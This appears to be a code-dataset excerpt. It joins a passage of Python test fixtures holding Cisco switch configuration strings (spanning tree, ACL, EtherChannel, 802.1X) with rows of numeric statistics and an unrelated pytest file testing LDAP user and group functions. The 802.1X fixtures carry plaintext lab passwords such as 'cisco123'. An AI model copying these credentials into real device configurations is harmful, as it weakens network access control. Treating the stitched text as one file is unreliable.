'ipv6 address 3020:3020::1/64\n'\
'interface GigabitEthernet1/0/1\n'\
'switchport trunk encapsulation dot1q\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut\n'\
'interface GigabitEthernet1/0/2\n'\
'switchport trunk encapsulation dot1q\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 99\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'no interface loopback1\n'\
'no vlan 99\n'\
'no interface vlan 99',
}
}
}
}
stp_base_uut = 'interface GigabitEthernet1/0/15\n'\
'shutdown\n'\
'interface GigabitEthernet1/0/16\n'\
'shutdown\n'\
'interface GigabitEthernet1/0/17\n'\
'shutdown\n'\
'interface GigabitEthernet1/0/1\n'\
'shutdown\n'\
'interface GigabitEthernet1/0/2\n'\
'shutdown\n'\
'interface GigabitEthernet1/0/3\n'\
'shutdown\n'\
'interface GigabitEthernet1/0/4\n'\
'shutdown\n'\
'interface GigabitEthernet1/0/7\n'\
'shutdown\n'\
'interface GigabitEthernet1/0/8\n'\
'shutdown\n'\
'interface GigabitEthernet1/0/9\n'\
'shutdown\n'\
'interface GigabitEthernet2/0/15\n'\
'shutdown\n'\
'interface GigabitEthernet3/0/15\n'\
'shutdown\n'\
'vlan 1-2\n'\
'no vlan 3-1000\n'\
'spanning-tree vlan 1-2\n'\
'spanning-tree mode pvst\n'\
'default int GigabitEthernet1/0/15\n'\
'int GigabitEthernet1/0/15\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 1-2\n'\
'shut\n'\
'no shut\n'\
'int GigabitEthernet1/0/16\n'\
'shut\n'\
'default int GigabitEthernet1/0/17\n'\
'int GigabitEthernet1/0/17\n'\
'switchport mode access\n'\
'switchport access vlan 1\n'\
'shut\n'\
'no shut\n'\
'default int GigabitEthernet2/0/15\n'\
'int GigabitEthernet2/0/15\n'\
'switchport mode access\n'\
'switchport access vlan 2\n'\
'shut\n'\
'no shut'
stp_base_helper = 'ip routing\n'\
'vlan 1-2\n'\
'exit\n'\
'spanning-tree vlan 1-2\n'\
'spanning-tree mode pvst\n'\
'ip vrf test1\n'\
'rd 100:1\n'\
'route-target export 100:1\n'\
'route-target import 100:1\n'\
'!\n'\
'ip vrf test2\n'\
'rd 100:2\n'\
'route-target export 100:2\n'\
'route-target import 100:2\n'\
'!\n'\
'ip vrf test3\n'\
'rd 100:3\n'\
'route-target export 100:3\n'\
'route-target import 100:3\n'\
'exit\n'\
'!\n'\
'default int Vlan1\n'\
'interface Vlan1\n'\
'ip vrf forwarding test1\n'\
'ip address 1.2.1.1 255.255.255.0\n'\
'no shut\n'\
'!\n'\
'interface Vlan2\n'\
'ip vrf forwarding test1\n'\
'ip address 1.2.2.1 255.255.255.0\n'\
'no shut\n'\
'!\n'\
'default int GigabitEthernet1/0/1\n'\
'interface GigabitEthernet1/0/1\n'\
'switchport trunk encapsulation dot1q\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 1-2\n'\
'no shut\n'\
'!\n'\
'interface GigabitEthernet1/0/2\n'\
'shut\n'\
'!\n'\
'default int GigabitEthernet1/0/3\n'\
'interface GigabitEthernet1/0/3\n'\
'no switchport\n'\
'ip vrf forwarding test2\n'\
'ip address 1.2.1.2 255.255.255.0\n'\
'no shut\n'\
'!\n'\
'default int GigabitEthernet1/0/4\n'\
'interface GigabitEthernet1/0/4\n'\
'no switchport\n'\
'ip vrf forwarding test3\n'\
'ip address 1.2.2.2 255.255.255.0\n'\
'no shut\n'\
'!\n'\
'loggin buffer 500000 debugging'
STP_root_check = {
'devices': {
'uut': {
'1': {
'config': stp_base_uut,
'unconfig': 'default vlan 1\n'\
'no vlan 2\n'\
'no interface vlan2',
},
'2': {
'config': 'spanning-tree vlan 1\n'\
'spanning-tree mode pvst\n'\
'default spanning-tree vlan 1 priority\n'\
'spanning-tree vlan 1 priority 0',
'unconfig': 'default spanning-tree vlan 1\n'\
'default spanning-tree mode\n'\
'default spanning-tree vlan 1 priority\n'\
'default interface GigabitEthernet2/0/15\n'\
'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface GigabitEthernet1/0/17\n'\
'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface GigabitEthernet1/0/3\n'\
'default interface GigabitEthernet1/0/4\n'\
'default interface GigabitEthernet1/0/7\n'\
'default interface GigabitEthernet1/0/8\n'\
'default interface GigabitEthernet1/0/9\n'\
'default interface GigabitEthernet3/0/15',
'sleep': 60
}
},
'helper': {
'1': {
'config': stp_base_helper,
'unconfig': 'no ip vrf test1\n'\
'no ip vrf test2\n'\
'no ip vrf test3\n'\
'default vlan 1\n'\
'no vlan 2\n'\
'no interface vlan2',
},
'2': {
'config': 'spanning-tree vlan 1\n'\
'spanning-tree mode pvst\n'\
'default spanning-tree vlan 1 priority',
'unconfig': 'default spanning-tree vlan 1\n'\
'default spanning-tree mode\n'\
'default spanning-tree vlan 1 priority\n'\
'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface GigabitEthernet1/0/3\n'\
'default interface GigabitEthernet1/0/4\n'\
'no interface vlan2',
}
}
}
}
STP_Rapid_PVST_root_check = {
'devices': {
'uut': {
'1': {
'config': stp_base_uut,
'unconfig': 'default vlan 1\n'\
'no vlan 2\n'\
'no interface vlan2',
},
'2': {
'config': 'vlan 1-2\n'\
'exit\n'\
'spanning-tree vlan 1-2\n'\
'spanning-tree mode rapid-pvst\n'\
'default spanning-tree vlan 1-2 priority\n'\
'spanning-tree vlan 1-2 priority 0',
'unconfig': 'default spanning-tree vlan 1\n'\
'default spanning-tree mode\n'\
'default spanning-tree vlan 1-2 priority\n'\
'default interface GigabitEthernet2/0/15\n'\
'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface GigabitEthernet1/0/17\n'\
'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface GigabitEthernet1/0/3\n'\
'default interface GigabitEthernet1/0/4\n'\
'default interface GigabitEthernet1/0/7\n'\
'default interface GigabitEthernet1/0/8\n'\
'default interface GigabitEthernet1/0/9\n'\
'no vlan 2\n'\
'default vlan 1\n'\
'default interface GigabitEthernet3/0/15',
'sleep': 60
}
},
'helper': {
'1': {
'config': stp_base_helper,
'unconfig': 'no ip vrf test1\n'\
'no ip vrf test2\n'\
'no ip vrf test3\n'\
'default vlan 1\n'\
'no vlan 2\n'\
'no interface vlan2',
},
'2': {
'config': 'vlan 1-2\n'\
'exit\n'\
'spanning-tree vlan 1-2\n'\
'spanning-tree mode rapid-pvst\n'\
'default spanning-tree vlan 1-2 priority',
'unconfig': 'default spanning-tree vlan 1\n'\
'default spanning-tree mode\n'\
'default spanning-tree vlan 1-2 priority\n'\
'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface GigabitEthernet1/0/3\n'\
'default interface GigabitEthernet1/0/4\n'\
'no vlan 2\n'\
'default vlan 1\n'\
'no interface vlan2',
}
}
}
}
ethernet_acl_pacl = {
'devices': {
'uut': {
'1': {
'config': stp_base_uut,
'unconfig': 'default vlan 1\n'\
'no vlan 2\n'\
'no interface vlan2',
},
'2': {
'config': 'vlan 1-2\n'\
'exit\n'\
'spanning-tree vlan 1-2\n'\
'spanning-tree mode rapid-pvst\n'\
'default spanning-tree vlan 1-2 priority',
'unconfig': 'default spanning-tree vlan 1\n'\
'default spanning-tree mode\n'\
'default spanning-tree vlan 1-2 priority\n'\
'default interface GigabitEthernet2/0/15\n'\
'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface GigabitEthernet1/0/17\n'\
'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface GigabitEthernet1/0/3\n'\
'default interface GigabitEthernet1/0/4\n'\
'default interface GigabitEthernet1/0/7\n'\
'default interface GigabitEthernet1/0/8\n'\
'default interface GigabitEthernet1/0/9\n'\
'no vlan 2\n'\
'default vlan 1\n'\
'default interface GigabitEthernet3/0/15',
'sleep': 50
}
},
'helper': {
'1': {
'config': stp_base_helper,
'unconfig': 'no ip vrf test1\n'\
'no ip vrf test2\n'\
'no ip vrf test3\n'\
'default vlan 1\n'\
'no vlan 2\n'\
'no interface vlan2',
},
'2': {
'config': 'vlan 1-2\n'\
'exit\n'\
'spanning-tree vlan 1-2\n'\
'spanning-tree mode rapid-pvst\n'\
'default spanning-tree vlan 1-2 priority',
'unconfig': 'default spanning-tree vlan 1\n'\
'default spanning-tree mode\n'\
'default spanning-tree vlan 1-2 priority\n'\
'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface GigabitEthernet1/0/3\n'\
'default interface GigabitEthernet1/0/4\n'\
'no vlan 2\n'\
'default vlan 1\n'\
'no interface vlan2',
}
}
}
}
ip_acl_pacl_permit = copy.deepcopy(ethernet_acl_pacl)
ip_acl_pacl_deny = copy.deepcopy(ethernet_acl_pacl)
ip_acl_racl = {
'devices': {
'helper': {
'1': {
'config': \
'interface vlan 10\n'\
'ip address 20.1.1.1 255.255.255.0\n'\
'no shut\n'\
'!\n'\
'default interface GigabitEthernet1/0/2\n'\
'interface GigabitEthernet1/0/2\n'\
'switchport mode access\n'\
'switchport access vlan 10\n'\
'no shut\n'\
'exit\n'\
'!\n'\
'ip routing\n'\
'ip route 1.5.1.0 255.255.255.0 20.1.1.2',
'unconfig': 'no interface vlan 10\n'\
'default interface GigabitEthernet1/0/2\n'\
'no ip route 1.5.1.0 255.255.255.0 20.1.1.2',
}
},
'uut': {
'1': {
'config': \
'interface vlan 10\n'\
'ip address 20.1.1.2 255.255.255.0\n'\
'no shut\n'\
'!\n'\
'default interface GigabitEthernet1/0/16\n'\
'interface GigabitEthernet1/0/16\n'\
'switchport mode access\n'\
'switchport access vlan 10\n'\
'no shut\n'\
'exit\n'\
'interface loopback 10\n'\
'ip address 1.5.1.1 255.255.255.0\n'\
'no shut\n'\
'!',
'unconfig': 'no interface vlan 10\n'\
'no vlan 10\n'\
'default interface GigabitEthernet1/0/16\n'\
'no interface loopback 10',
'sleep': 40
}
}
}
}
Etherchannel_LACP_ping_check = {
'devices': {
'helper': {
'1': {
'config': 'vlan 11\n'\
'spanning-tree mode rapid-pvst\n'\
'interface Vlan11\n'\
'ip address 1.2.1.1 255.255.255.0\n'\
'no shut\n'\
'!\n'\
'default int GigabitEthernet1/0/1\n'\
'interface GigabitEthernet1/0/1\n'\
'switchport trunk encapsulation dot1q\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 11\n'\
'channel-group 10 mode passive\n'\
'no shut\n'\
'!\n'\
'default int GigabitEthernet1/0/2\n'\
'interface GigabitEthernet1/0/2\n'\
'switchport trunk encapsulation dot1q\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 11\n'\
'channel-group 10 mode passive\n'\
'no shut\n'\
'!\n'\
'default int GigabitEthernet1/0/3\n'\
'interface GigabitEthernet1/0/3\n'\
'switchport trunk encapsulation dot1q\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 11\n'\
'channel-group 10 mode passive\n'\
'no shut\n'\
'!\n'\
'loggin buffer 500000 debugging',
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface GigabitEthernet1/0/3\n'\
'no vlan 11\n'\
'no interface vlan 11\n'\
'no interface Port-channel10\n'\
'no spanning-tree mode rapid-pvst',
}
},
'uut': {
'1': {
'config': 'no vlan 11\n'\
'vlan 11\n'\
'spanning-tree mode rapid-pvst\n'\
'spanning-tree vlan 11\n'\
'no interface Vlan11\n'\
'no interface Po10\n'\
'interface Vlan11\n'\
'ip address 1.2.1.2 255.255.255.0\n'\
'no shut\n'\
'default interface GigabitEthernet1/0/15\n'\
'interface GigabitEthernet1/0/15\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 11\n'\
'no shut\n'\
'default interface GigabitEthernet1/0/16\n'\
'interface GigabitEthernet1/0/16\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 11\n'\
'no shut\n'\
'default interface GigabitEthernet1/0/17\n'\
'interface GigabitEthernet1/0/17\n'\
'switchport mode trunk\n'\
'switchport trunk allowed vlan 11\n'\
'no shut\n'\
'!\n'\
'loggin buffer 500000 debugging',
'unconfig': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface GigabitEthernet1/0/17\n'\
'no interface vlan11\n'\
'no vlan 11\n'\
'no interface Port-channel10\n'\
'no spanning-tree mode rapid-pvst',
'sleep': 40
}
}
}
}
Etherchannel_PAGP_ping_check = {
'devices': {
'helper': {
'1': {
'config': 'vlan 11\n'\
'spanning-tree mode rapid-pvst\n'\
'!\n'\
'interface Vlan11\n'\
'ip address 1.2.1.1 255.255.255.0\n'\
'no shut\n'\
'!\n'\
'default int GigabitEthernet1/0/1\n'\
'interface GigabitEthernet1/0/1\n'\
'switchport mode access\n'\
'switchport access vlan 11\n'\
'channel-group 10 mode desirable non-silent\n'\
'no shut\n'\
'!\n'\
'default int GigabitEthernet1/0/2\n'\
'interface GigabitEthernet1/0/2\n'\
'switchport mode access\n'\
'switchport access vlan 11\n'\
'channel-group 10 mode desirable non-silent\n'\
'no shut\n'\
'!\n'\
'default int GigabitEthernet1/0/3\n'\
'interface GigabitEthernet1/0/3\n'\
'switchport mode access\n'\
'switchport access vlan 11\n'\
'channel-group 10 mode desirable non-silent\n'\
'no shut\n'\
'!\n'\
'loggin buffer 500000 debugging',
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface GigabitEthernet1/0/3\n'\
'no vlan 11\n'\
'no interface vlan 11\n'\
'no interface Port-channel10\n'\
'no spanning-tree mode rapid-pvst',
}
},
'uut': {
'1': {
'config': 'no vlan 11\n'\
'vlan 11\n'\
'spanning-tree mode rapid-pvst\n'\
'interface Vlan11\n'\
'ip address 1.2.1.2 255.255.255.0\n'\
'no shut\n'\
'!\n'\
'default int GigabitEthernet1/0/15\n'\
'interface GigabitEthernet1/0/15\n'\
'switchport mode access\n'\
'switchport access vlan 11\n'\
'no shut\n'\
'!\n'\
'default int GigabitEthernet1/0/16\n'\
'interface GigabitEthernet1/0/16\n'\
'switchport mode access\n'\
'switchport access vlan 11\n'\
'no shut\n'\
'!\n'\
'default int GigabitEthernet1/0/17\n'\
'interface GigabitEthernet1/0/17\n'\
'switchport mode access\n'\
'switchport access vlan 11\n'\
'no shut\n'\
'!\n'\
'loggin buffer 500000 debugging',
'unconfig': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface GigabitEthernet1/0/17\n'\
'no interface vlan11\n'\
'no vlan 11\n'\
'no interface Port-channel10\n'\
'no spanning-tree mode rapid-pvst',
'sleep': 30
}
}
}
}
L3_Etherchannel_ping_check = {
'devices': {
'helper': {
'1': {
'config': 'default interface GigabitEthernet1/0/1\n'\
'interface GigabitEthernet1/0/1\n'\
'no switchport\n'\
'channel-group 10 mode desirable non-silent\n'\
'no shut\n'\
'!\n'\
'default interface GigabitEthernet1/0/2\n'\
'interface GigabitEthernet1/0/2\n'\
'no switchport\n'\
'channel-group 10 mode desirable non-silent\n'\
'no shut\n'\
'!\n'\
'default interface GigabitEthernet1/0/3\n'\
'interface GigabitEthernet1/0/3\n'\
'no switchport\n'\
'channel-group 10 mode desirable non-silent\n'\
'no shut\n'\
'!\n'\
'interface Po10\n'\
'no switchport\n'\
'ip address 1.2.1.1 255.255.255.0\n'\
'no shut\n'\
'!\n'\
'loggin buffer 500000 debugging',
'unconfig': 'default interface GigabitEthernet1/0/1\n'\
'default interface GigabitEthernet1/0/2\n'\
'default interface GigabitEthernet1/0/3\n'\
'no interface Port-channel10',
}
},
'uut': {
'1': {
'config': 'spanning-tree mode rapid-pvst\n'\
'!\n'\
'default interface Port-channel10\n'\
'interface Port-channel10\n'\
'no switchport\n'\
'no shut\n'\
'ip address 1.2.1.2 255.255.255.0\n'\
'!\n'\
'default interface GigabitEthernet1/0/15\n'\
'interface GigabitEthernet1/0/15\n'\
'no switchport\n'\
'no shut\n'\
'!\n'\
'default interface GigabitEthernet1/0/16\n'\
'interface GigabitEthernet1/0/16\n'\
'no switchport\n'\
'no shut\n'\
'!\n'\
'default interface GigabitEthernet1/0/17\n'\
'interface GigabitEthernet1/0/17\n'\
'no switchport\n'\
'no shut\n'\
'!\n'\
'loggin buffer 500000 debugging',
'unconfig': 'default interface GigabitEthernet1/0/15\n'\
'default interface GigabitEthernet1/0/16\n'\
'default interface GigabitEthernet1/0/17\n'\
'no interface Port-channel10\n'\
'no spanning-tree mode rapid-pvst',
'sleep': 30
}
}
}
}
dot1x_base_uut = 'interface vlan 1\n'\
'!name default\n'\
'!\n'\
'interface vlan 20\n'\
'!name nondefault\n'\
'!\n'\
'dot1x system-auth-control\n'\
'!\n'\
'interface GigabitEthernet1/0/15\n'\
'shut\n'\
'interface vlan1\n'\
'no ip address\n'\
'interface vlan20\n'\
'no ip address\n'\
'no shut\n'\
'policy-map type control subscriber dummy\n'\
'!\n'\
'no policy-map type control subscriber dummy\n'\
'!\n'\
'aaa new-model\n'\
'aaa session-id common\n'\
'aaa authentication dot1x default local\n'\
'aaa authorization network default local\n'\
'aaa local authentication default authorization default\n'\
'aaa authorization credential-download default local\n'\
'!\n'\
'eap profile EAP-METH\n'\
'method md5\n'\
'!\n'\
'interface GigabitEthernet1/0/15\n'\
'dot1x authenticator eap profile EAP-METH\n'\
'username switch password 0 cisco123\n'\
'username switch4 password 0 cisco123'
dot1x_base_helper = 'line con 0\n'\
'exec-timeout 0 0\n'\
'!\n'\
'ip routing\n'\
'ip domain-name cisco\n'\
'cdp run\n'\
'dot1x system-auth-control\n'\
'dot1x supplicant force-multicast\n'\
'!\n'\
'ip vrf ABCD\n'\
'!\n'\
'eap profile EAP-METH\n'\
'method md5\n'\
'!\n'\
'dot1x credentials switch1\n'\
'username switch\n'\
'password 0 cisco123\n'\
'!\n'\
'dot1x credentials switch2\n'\
'username switch2\n'\
'password 0 cisco123\n'\
'!\n'\
'dot1x credentials switch3\n'\
'username switch3\n'\
'password 0 cisco123\n'\
'!\n'\
'dot1x credentials switch4\n'\
'username switch4\n'\
'password 0 cisco123\n'\
'!\n'\
'dot1x credentials user1\n'\
'username user1\n'\
'password 0 cisco\n'\
'!\n'\
'dot1x credentials user2\n'\
'username aaaaa\n'\
'password 0 cisco\n'\
'!\n'\
'!\n'\
'dot1x credentials wrong\n'\
'username wrong\n'\
'password 0 wrong'
dot1xeapsessiondefaultvlan = {
'devices': {
'uut': {
'1': {
'config': dot1x_base_uut,
'unconfig': 'no interface vlan20\n'\
'default interface vlan1\n'\
'no dot1x system-auth-control\n'\
'default interface GigabitEthernet1/0/15\n'\
'no aaa authentication dot1x default local\n'\
'no aaa authorization network default local\n'\
'no aaa authorization credential-download default local\n'\
'no username switch\n'\
'no username switch4\n'\
'no eap profile EAP-METH\n'\
'no parameter-map type webauth global\n'\
'no policy-map type control subscriber DOT1X\n'\
'no service-template DEFAULT_CRITICAL_VOICE_TEMPLATE\n'\
'no service-template DEFAULT_LINKSEC_POLICY_MUST_SECURE\n'\
'no service-template DEFAULT_LINKSEC_POLICY_SHOULD_SECURE\n'\
'no service-template webauth-global-inactive\n'\
'no aaa local authentication default authorization default\n'\
'no aaa new-model',
},
'2': {
'config': 'interface GigabitEthernet1/0/15\n'\
'dot1x authenticator eap profile EAP-METH\n'\
'policy-map type control subscriber DOT1X\n'\
'event session-started match-all\n'\
'1 class always do-until-failure\n'\
'1 authenticate using dot1x\n'\
'interface GigabitEthernet1/0/15\n'\
'no shut\n'\
'switchport\n'\
'switchport mode access\n'\
'switchport access vlan 1\n'\
'no access-session closed\n'\
'no switchport port-security\n'\
'access-session port-control auto\n'\
'access-session host-mode multi-auth\n'\
'dot1x pae authenticator\n'\
'dot1x authenticator eap profile EAP-METH\n'\
'service-policy type control subscriber DOT1X\n'\
'interface vlan1\n'\
'!no switchport\n'\
'ip address 1.1.1.2 255.255.255.0\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/15\n'\
'no policy-map type control subscriber DOT1X\n'\
'default interface vlan 1',
'sleep': 45
}
},
'helper': {
'1': {
'config': dot1x_base_helper,
'unconfig': 'no dot1x system-auth-control\n'\
'no dot1x supplicant force-multicast\n'\
'!\n'\
'no eap profile EAP-METH\n'\
'!\n'\
'no dot1x credentials switch\n'\
'!\n'\
'default interface GigabitEthernet1/0/1\n'\
'no dot1x credentials switch1\n'\
'no dot1x credentials switch2\n'\
'no dot1x credentials switch3\n'\
'no dot1x credentials switch4\n'\
'no dot1x credentials user1\n'\
'no dot1x credentials user2\n'\
'no ip vrf ABCD\n'\
'no ip domain-name cisco\n'\
'no dot1x credentials wrong',
},
'2': {
'config': 'interface GigabitEthernet1/0/1\n'\
'no switchport\n'\
'ip address 1.1.1.1 255.255.255.0\n'\
'dot1x pae supplicant\n'\
'dot1x credentials switch1\n'\
'dot1x supplicant eap profile EAP-METH\n'\
'no shut',
'unconfig': 'default interface GigabitEthernet1/0/1',
}
}
}
}
dot1xeapsessionWrongUser = {
'devices': {
'uut': {
'peer': 'helper',
'name': 'GigabitEthernet1/0/15',
'peer_intf': 'GigabitEthernet1/0/1',
'1': {
'config': dot1x_base_uut,
'unconfig': 'no interface vlan20\n'\
'default interface vlan1\n'\
'no dot1x system-auth-control\n'\
'default interface {name}\n'\
'no aaa authentication dot1x default local\n'\
'no aaa authorization network default local\n'\
'no aaa authorization credential-download default local\n'\
'no username switch\n'\
'no username switch4\n'\
'no eap profile EAP-METH\n'\
'no parameter-map type webauth global\n'\
'no policy-map type control subscriber DOT1X\n'\
'no service-template DEFAULT_CRITICAL_VOICE_TEMPLATE\n'\
'no service-template DEFAULT_LINKSEC_POLICY_MUST_SECURE\n'\
'no service-template DEFAULT_LINKSEC_POLICY_SHOULD_SECURE\n'\
'no service-template webauth-global-inactive\n'\
'no aaa local authentication default authorization default\n'\
'no aaa new-model',
},
'2': {
'config': 'interface {name}\n'\
'dot1x authenticator eap profile EAP-METH\n'\
'policy-map type control subscriber DOT1X\n'\
'event session-started match-all\n'\
'1 class always do-until-failure\n'\
'1 authenticate using dot1x\n'\
'interface {name}\n'\
'no shut\n'\
'switchport\n'\
'switchport mode access\n'\
'switchport access vlan 20\n'\
'access-session closed\n'\
'no switchport port-security\n'\
'access-session port-control auto\n'\
'access-session host-mode single-host\n'\
'dot1x pae authenticator\n'\
'dot1x authenticator eap profile EAP-METH\n'\
'service-policy type control subscriber DOT1X',
'unconfig': 'default interface {name}\n'\
'no policy-map type control subscriber DOT1X\n'\
'no vlan 20\n'\
'no interface vlan 20',
'sleep': 45
}
},
'helper': {
'1': {
'config': dot1x_base_helper,
'unconfig': 'no dot1x system-auth-control\n'\
'no dot1x supplicant force-multicast\n'\
'!\n'\
'no eap profile EAP-METH\n'\
'!\n'\
'no dot1x credentials switch\n'\
'!\n'\
'default interface {peer_intf}\n'\
'no dot1x credentials switch1\n'\
'no dot1x credentials switch2\n'\
'no dot1x credentials switch3\n'\
'no dot1x credentials switch4\n'\
'no dot1x credentials user1\n'\
'no dot1x credentials user2\n'\
'no ip vrf ABCD\n'\
'no ip domain-name cisco\n'\
'no dot1x credentials wrong',
},
'2': {
'config': 'interface {peer_intf}\n'\
'no switchport\n'\
'ip address 1.1.1.1 255.255.255.0\n'\
'dot1x pae supplicant\n'\
'dot1x credentials switch1\n'\
'dot1x supplicant eap profile EAP-METH\n'\
'no shut',
'unconfig': 'default interface {peer_intf}',
}
}
}
}
| 48.220827
| 108
| 0.36299
| 5,318
| 65,291
| 4.433998
| 0.04419
| 0.034733
| 0.232655
| 0.202926
| 0.940331
| 0.914673
| 0.867981
| 0.846141
| 0.832909
| 0.813316
| 0
| 0.075754
| 0.542663
| 65,291
| 1,353
| 109
| 48.256467
| 0.713932
| 0.000092
| 0
| 0.779789
| 0
| 0.004525
| 0.411256
| 0.091157
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.00905
| 0.003017
| 0
| 0.022624
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
214a7ac0321b88a7173e6413e3477a6a9497ff1a
| 7,949
|
py
|
Python
|
tests/krs/test_ldap.py
|
WIPACrepo/keycloak-rest-services
|
2661b0db2dd320bdb8eefc62c805188bec52ecc7
|
[
"MIT"
] | 1
|
2021-09-23T14:39:36.000Z
|
2021-09-23T14:39:36.000Z
|
tests/krs/test_ldap.py
|
WIPACrepo/keycloak-rest-services
|
2661b0db2dd320bdb8eefc62c805188bec52ecc7
|
[
"MIT"
] | 38
|
2020-08-31T22:53:09.000Z
|
2022-03-28T20:55:39.000Z
|
tests/krs/test_ldap.py
|
WIPACrepo/keycloak-rest-services
|
2661b0db2dd320bdb8eefc62c805188bec52ecc7
|
[
"MIT"
] | null | null | null |
import pytest
from krs import ldap
from ..util import ldap_bootstrap
def test_get_users_none(ldap_bootstrap):
with pytest.raises(KeyError):
ldap_bootstrap.get_user('foo')
def test_list_users_none(ldap_bootstrap):
ret = ldap_bootstrap.list_users()
assert not ret
def test_create_user(ldap_bootstrap):
ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
ret = ldap_bootstrap.get_user('foo')
assert ret['uid'] == 'foo'
assert ret['givenName'] == 'foo'
assert ret['sn'] == 'bar'
assert ret['mail'] == 'foo@bar'
def test_list_users(ldap_bootstrap):
ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
ret = ldap_bootstrap.list_users()
assert len(ret) == 1
assert 'foo' in ret
assert ret['foo']['uid'] == 'foo'
assert ret['foo']['givenName'] == 'foo'
assert ret['foo']['sn'] == 'bar'
assert ret['foo']['mail'] == 'foo@bar'
def test_list_users_attrs(ldap_bootstrap):
ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
ret = ldap_bootstrap.list_users(['sn'])
assert len(ret) == 1
assert 'foo' in ret
assert ret['foo']['sn'] == 'bar'
assert 'uid' not in ret['foo']
def test_create_user_fail(ldap_bootstrap):
with pytest.raises(Exception):
ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar')
with pytest.raises(KeyError):
ldap_bootstrap.get_user('foo')
def test_modify_user_class(ldap_bootstrap):
ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
ldap_bootstrap.modify_user('foo', {'gidNumber': 1234, 'uidNumber': 1234, 'homeDirectory': '/home/foo'}, objectClass='posixAccount')
ret = ldap_bootstrap.get_user('foo')
assert ret['gidNumber'] == 1234
assert 'posixAccount' in ret['objectClass']
def test_modify_user_remove_class(ldap_bootstrap):
ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
ldap_bootstrap.modify_user('foo', {'gidNumber': 1234, 'uidNumber': 1234, 'homeDirectory': '/home/foo'}, objectClass='posixAccount')
ldap_bootstrap.modify_user('foo', {'gidNumber': None, 'uidNumber': None, 'homeDirectory': None}, removeObjectClass='posixAccount')
ret = ldap_bootstrap.get_user('foo')
assert 'gidNumber' not in ret
assert 'posixAccount' not in ret['objectClass']
def test_modify_user_attrs(ldap_bootstrap):
ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
ldap_bootstrap.modify_user('foo', {'givenName': 'foofoo'})
ret = ldap_bootstrap.get_user('foo')
assert ret['givenName'] == 'foofoo'
def test_modify_user_fail(ldap_bootstrap):
ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
with pytest.raises(Exception):
# missing homeDirectory for posixAccount
ldap_bootstrap.modify_user('foo', {'gidNumber': 1234, 'uidNumber': 1234}, objectClass='posixAccount')
ret = ldap_bootstrap.get_user('foo')
assert 'gidNumber' not in ret
with pytest.raises(Exception):
# cannot add field gidNumber with current objectClasses
ldap_bootstrap.modify_user('foo', {'gidNumber': 1234})
ret = ldap_bootstrap.get_user('foo')
assert 'gidNumber' not in ret
ldap_bootstrap.modify_user('foo', {'gidNumber': 1234, 'uidNumber': 1234, 'homeDirectory': '/home/foo'}, objectClass='posixAccount')
with pytest.raises(Exception):
# cannot remove objectClass without removing attrs
ldap_bootstrap.modify_user('foo', removeObjectClass='posixAccount')
def test_create_group(ldap_bootstrap):
ldap_bootstrap.create_group('foo')
ret = ldap_bootstrap.list_groups()
assert list(ret.keys()) == ['foo']
def test_list_group(ldap_bootstrap):
ret = ldap_bootstrap.list_groups()
assert list(ret.keys()) == []
def test_add_user_group(ldap_bootstrap):
ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
ldap_bootstrap.create_group('foo')
ldap_bootstrap.add_user_group('foo', 'foo')
ret = ldap_bootstrap.list_groups()
assert list(ret.keys()) == ['foo']
assert any(member.startswith('uid=foo,') for member in ret['foo']['member'])
def test_add_user_group_twice(ldap_bootstrap):
ldap_bootstrap.create_user(username='foo', firstName='foo', lastName='bar', email='foo@bar')
ldap_bootstrap.create_group('foo')
ldap_bootstrap.add_user_group('foo', 'foo')
ldap_bootstrap.add_user_group('foo', 'foo')
ret = ldap_bootstrap.list_groups()
assert list(ret.keys()) == ['foo']
